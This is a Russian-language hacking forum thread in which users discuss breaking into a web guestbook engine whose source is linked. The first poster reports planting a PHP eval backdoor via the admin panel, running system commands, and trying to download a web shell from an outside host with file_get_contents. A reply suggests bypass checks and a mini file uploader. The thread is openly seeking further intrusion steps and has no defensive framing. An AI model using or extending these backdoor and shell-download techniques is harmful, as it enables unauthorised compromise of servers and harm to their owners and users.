Собственно интересует наличие уязвимостей данного движка гостевой книги. Есть доступ в админку Движок работает только на файлах без использования внешних бд В админке можно включить html код в коментариях но толку от этого никакого Можно задать имя бд например config.php и слить дамп в формате .dat файла. но толку от этого тоже никакого т.к. из своей директории путем "../../../" выбраться нельзя. Есть загрузка дампа для востановления бд но ни шелл ни дамп не льётся на сервер. Исходники движка можно скачать тут: http://gb.lugr.ru/ Может кто нибудь подскажет как разбомбить это NoName скрипт?
Через админку удалось записать бэкдор типа: Code: eval($_REQUEST[e]); После чего успешно выполнил phpinfo(); далее пытаюсь залить шелл: Code: $fh = fopen('new.php', "a+");fwrite($fh, file_get_contents('http://somesite.ru/newfile.txt'));fclose($fh); и мне выдаёт: Так же успешно выполняется команда system(ls); но никуда попасть больше не могу... Получаю Method Not Implemented Подскажите как действовать дальше?
это WAF? allow_url_fopen? только с GET так? какие загрузчики пробовали? может лучше сделать мини аплоадер файлов?
1.По поводу WAF не знаю. 2.allow_url_fopen on 3.Пост запросы не пробовал 4.мини аплоадер методом POST? Если можно ссылочку для примера.